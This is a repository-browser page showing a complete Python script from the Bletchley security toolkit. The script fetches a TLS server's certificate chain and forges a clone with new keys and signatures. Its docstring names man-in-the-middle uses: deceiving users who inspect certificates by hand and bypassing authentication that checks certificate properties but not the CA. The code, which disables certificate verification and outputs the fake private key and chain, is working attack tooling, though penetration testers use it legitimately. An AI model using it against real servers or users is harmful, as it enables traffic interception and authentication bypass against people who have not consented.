source: trunk/bin/bletchley-clonecertchain @ 74

Last change on this file since 74 was 74, checked in by tim, 10 years ago

fixed script in cases where server rejects client handshake due to lack of client cert or other problems

  • Property svn:executable set to *
File size: 8.6 KB
Line 
1#!/usr/bin/env python3
2#-*- mode: Python;-*-
3#
4# Requires Python 3+
5
6
7'''
8An experimental script which attempts to clone a server certificate's entire
9certificate chain, ideally altering only the keys and signatures along the
10way.
11
12This is useful in a few man-in-the-middle attack situations, including:
13- You swap out certificates on a user and the manually inspect the certificate
14  properties before accepting them.  Identical properties are more convincing.
15
16- A product includes special-purpose certificate properties that are validated
17  with custom procedures (e.g. client user name, product serial number, ...). 
18  If these properties are validated but the certificate's CA isn't, then cloning
19  the full set of certificate properties is essential to bypass the
20  authentication.
21
22Currently, this script is somewhat limited and buggy, but will hopefully
23improve over time.  Patches welcome!
24
25
26Copyright (C) 2014 Blindspot Security LLC
27Author: Timothy D. Morgan
28
29 This program is free software: you can redistribute it and/or modify
30 it under the terms of the GNU Lesser General Public License, version 3,
31 as published by the Free Software Foundation.
32
33 This program is distributed in the hope that it will be useful,
34 but WITHOUT ANY WARRANTY; without even the implied warranty of
35 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
36 GNU General Public License for more details.
37
38 You should have received a copy of the GNU General Public License
39 along with this program.  If not, see <http://www.gnu.org/licenses/>.
40'''
41
42import sys
43import argparse
44import traceback
45import socket
46try:
47    import OpenSSL
48    from OpenSSL import SSL
49except:
50    sys.stderr.write('ERROR: Could not locate pyOpenSSL module.  Under Debian-based systems, try:\n')
51    sys.stderr.write('       # apt-get install python3-openssl\n')
52    sys.stderr.write('NOTE: pyOpenSSL version 0.14 or later is required!\n')
53    sys.exit(2)
54
55
56def createClientContext():
57    tlsClientContext = SSL.Context(SSL.SSLv3_METHOD)
58    tlsClientContext.set_verify(SSL.VERIFY_NONE, (lambda a,b,c,d,e: True))
59    return tlsClientContext
60
61
62def fetchCertificateChain(host, port):
63    serverSock = socket.socket()
64    serverSock.connect((host,port))
65   
66    chain = None
67    try:
68        server = SSL.Connection(createClientContext(), serverSock)
69        server.set_connect_state()
70        server.do_handshake()
71    except Exception as e:
72        sys.stderr.write("Exception during handshake with server: \n")
73        traceback.print_exc(file=sys.stderr)
74        sys.stderr.write("\nThis typically occurs when server rejects our "
75                         "connection due to lack of a client certificate or"
76                         " for similar reasons.\nAttempting to continue...\n\n")
77       
78    return server.get_peer_cert_chain()
79
80
81def normalizeCertificateName(cert_name):
82    n = cert_name.get_components()
83    n.sort()
84    return tuple(n)
85
86
87def normalizeCertificateChain(chain):
88    # Organize certificates by subject and issuer for quick lookups
89    subject_table = {}
90    issuer_table = {}
91    for c in chain:
92        subject_table[normalizeCertificateName(c.get_subject())] = c
93        issuer_table[normalizeCertificateName(c.get_issuer())] = c
94
95    # Now find root or highest-level intermediary
96    root = None
97    for c in chain:
98        i = normalizeCertificateName(c.get_issuer())
99        s = normalizeCertificateName(c.get_subject())
100        if (i == s) or (i not in subject_table):
101            if root != None:
102                sys.stderr.write("WARN: Multiple root certificates found or broken certificate chain detected.")
103            else:
104                # Go with the first identified "root", since that's more likely to link up with the server cert
105                root = c
106
107    # Finally, build the chain from the top-down in the correct order
108    new_chain = []
109    nxt = root
110    while nxt != None:
111        new_chain = [nxt] + new_chain
112        s = normalizeCertificateName(nxt.get_subject())
113        nxt = issuer_table.get(s)
114   
115    return new_chain
116   
117
118def genFakeKey(certificate):
119    fake_key = OpenSSL.crypto.PKey()
120    old_pubkey = certificate.get_pubkey()
121    fake_key.generate_key(old_pubkey.type(), old_pubkey.bits())
122
123    return fake_key
124
125
126def getDigestAlgorithm(certificate):
127    # XXX: ugly hack because pyopenssl API for this is limited
128    if b'md5' in certificate.get_signature_algorithm():
129        return 'md5'
130    else:
131        return 'sha1'
132
133
134def deleteExtension(certificate, index):
135    import cffi
136    from cffi import FFI
137    ffi = FFI()
138    ffi.cdef('''void* X509_delete_ext(void* x, int loc);''')
139    libssl = ffi.dlopen('libssl.so')
140    ext = libssl.X509_delete_ext(certificate._x509, index)
141    #XXX: supposed to free ext here
142
143
144def removePeskyExtensions(certificate):
145    #for index in range(0,certificate.get_extension_count()):
146    #    e = certificate.get_extension(index)
147    #    print("extension %d: %s\n" % (index, e.get_short_name()), e)
148
149    index = 0
150    while index < certificate.get_extension_count():
151        e = certificate.get_extension(index)
152        if e.get_short_name() in (b'subjectKeyIdentifier', b'authorityKeyIdentifier'):
153            deleteExtension(certificate, index)
154            #XXX: would be nice if each of these extensions were re-added with appropriate values
155            index -= 1
156        index += 1
157   
158    #for index in range(0,certificate.get_extension_count()):
159    #    e = certificate.get_extension(index)
160    #    print("extension %d: %s\n" % (index, e.get_short_name()), e)
161
162
163def genFakeCertificateChain(cert_chain):
164    ret_val = []
165    cert_chain.reverse() # start with highest level authority
166
167    c = cert_chain[0]
168    i = normalizeCertificateName(c.get_issuer())
169    s = normalizeCertificateName(c.get_subject())
170    if s != i:
171        # XXX: consider retrieving root locally and including a forged version instead
172        c.set_issuer(c.get_subject())
173    k = genFakeKey(c)
174    c.set_pubkey(k)
175    removePeskyExtensions(c)
176    c.sign(k, getDigestAlgorithm(c))
177    ret_val.append(c)
178
179    prev = k
180    for c in cert_chain[1:]:
181        k = genFakeKey(c)
182        c.set_pubkey(k)
183        removePeskyExtensions(c)
184        c.sign(prev, getDigestAlgorithm(c))
185        prev = k
186        ret_val.append(c)
187
188    ret_val.reverse()
189    return k,ret_val
190
191
192parser = argparse.ArgumentParser(
193    description="An experimental script which attempts to clone an SSL server's"
194    " entire certificate chain, ideally altering only the keys and signatures"
195    " along the way.  The script prints results to stdout, starting with a PKCS7 (PEM)"
196    " key (the fake server private key) followed by the newly forged certificate"
197    " chain, also in PEM format.  (The new intermediate and root private keys are"
198    " not currently printed, but will likely be somehow available in a future"
199    " version.)")
200
201parser.add_argument('host', nargs=1, default=None,
202                    help='IP address or host name of server')
203parser.add_argument('port', nargs='?', type=int, default=443,
204                    help='TCP port number of SSL service (default: 443)')
205parser.add_argument(
206    '--p12', dest='p12_filename', type=str, required=False, default=None,
207    help='If specified, a PKCS12 file will be written with the generated certificates'
208    ' and server key (in addition to normal PKCS7 output).  NOTE: the file specified'
209    ' will be overwritten without prompting if it already exists.')
210parser.add_argument(
211    '--p12password', dest='p12_password', type=str, required=False, default='bletchley',
212    help='If specified along with the --p12 argument, the PKCS12 file will use this password'
213    ' to encrypt the server private key.  (Otherwise, the password "bletchley" is used).')
214options = parser.parse_args()
215
216#print("REAL CHAIN:")
217chain = fetchCertificateChain(options.host[0],options.port)
218#for c in chain:
219#    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
220
221#chain = normalizeCertificateChain(chain)
222#for c in chain:
223#    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
224
225#print("FAKE KEY AND CHAIN:")
226if not chain:
227    sys.stderr.write("ERROR: Could not retrieve server certificate\n\n")
228    sys.exit(2)
229
230fake_key, fake_chain = genFakeCertificateChain(chain)
231print(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, fake_key).decode('utf-8'))
232for c in fake_chain:
233    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
234
235if options.p12_filename:
236    p12_file = open(options.p12_filename, 'w+b')
237
238    p12 = OpenSSL.crypto.PKCS12()
239    p12.set_ca_certificates(fake_chain[1:])
240    p12.set_privatekey(fake_key)
241    p12.set_certificate(fake_chain[0])
242
243    p12_file.write(p12.export(passphrase=options.p12_password.encode('utf-8')))
244    p12_file.close()
Note: See TracBrowser for help on using the repository browser.